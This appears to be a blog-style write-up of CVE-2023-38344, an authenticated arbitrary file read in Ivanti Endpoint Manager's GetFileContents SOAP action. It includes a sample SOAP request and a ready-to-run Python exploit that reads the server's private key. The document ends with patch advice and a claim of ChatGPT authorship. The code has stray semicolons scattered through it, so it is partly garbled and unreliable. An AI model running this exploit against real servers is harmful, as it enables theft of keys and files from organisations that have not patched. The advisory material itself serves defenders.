CVE-2023-38344 - How File Disclosure Haunts Ivanti Endpoint Manager (Explained with Code and Exploit Example)

If you manage IT systems, you may know Ivanti Endpoint Manager (EPM), a retail-class software platform for managing devices. But did you know about CVE-2023-38344—a vulnerability discovered before EPM’s 2022 SU4 update that could let attackers read private files right off your servers? Let's break down this critical flaw, show code snippets, an exploit example, and what you need to do right now.

What’s CVE-2023-38344?

CVE-2023-38344 is a high-severity file disclosure vulnerability that affects Ivanti Endpoint Manager before the 2022 SU4 release. The flaw is in the SOAP web service—specifically, the GetFileContents action in /landesk/managementsuite/core/core.secure/OsdScript.asmx. This action trusts user input for file paths *way too much*. An authenticated attacker can use this to read almost any file on the server, including Ivanti's own private keys.

How Does the Vulnerability Happen?

Ivanti’s server exposes a SOAP service, /OsdScript.asmx, with an action called GetFileContents. This action simply takes whatever file path it receives and returns the file’s contents over the network—no safety checks.

Example: A typical SOAP request looks like this

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">;
  <soap:Body>
    <GetFileContents xmlns="http://tempuri.org/">;
      <fileName>C:\Windows\System32\drivers\etc\hosts</fileName>
    </GetFileContents>
  </soap:Body>
</soap:Envelope>

If you’re authenticated, you’ll get the contents of the file. No limitations. That’s dangerous.

How Could Attackers Exploit This?

An attacker (even with low-level credentials) could use this to read ANY file the web app can access—for example:

Python Exploit Example

Here’s a simple Python example using requests to read the Ivanti private key (commonly stored at C:\Program Files\LANDesk\ManagementSuite\privatekey.pem):

import requests

url = "https://<victim-ip>/landesk/managementsuite/core/core.secure/OsdScript.asmx";
username = "VALID_IVANTI_USER"
password = "VALID_IVANTI_PASS"

file_path = r"C:\Program Files\LANDesk\ManagementSuite\privatekey.pem"
soap_body = f"""
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">;
  <soap:Body>
    <GetFileContents xmlns="http://tempuri.org/">;
      <fileName>{file_path}</fileName>
    </GetFileContents>
  </soap:Body>
</soap:Envelope>
"""

headers = {
    "Content-Type": "text/xml; charset=utf-8",
    "SOAPAction": "http://tempuri.org/GetFileContents";,
}

session = requests.Session()
session.auth = (username, password)

response = session.post(url, data=soap_body, headers=headers, verify=False)
print(response.text)

> Warning: This exploit will fetch *any* file (if creds are valid). Attackers could exfiltrate secrets in seconds.

Original References

- Ivanti Security Advisory - CVE-2023-38344
- NIST NVD: CVE-2023-38344
- FullDisclosure

Update to 2022 SU4 or later (the patch blocks unrestricted file access)

- Restrict access to /landesk/managementsuite/core/core.secure/OsdScript.asmx (limit network exposure)

Final Thoughts

CVE-2023-38344 might seem like “just another file disclosure,” but in reality, it could let attackers leapfrog into full remote compromise of your systems. If EPM powers your devices, patch *immediately*—and check whether attackers have been snooping around your files.


Keep your systems updated and play it safe out there!

*Exclusive writeup by ChatGPT AI, June 2024*

If you found this helpful, read the original advisory: Ivanti Security Bulletin

Timeline

Published on: 09/21/2023 21:15:00 UTC
Last modified on: 09/25/2023 17:04:00 UTC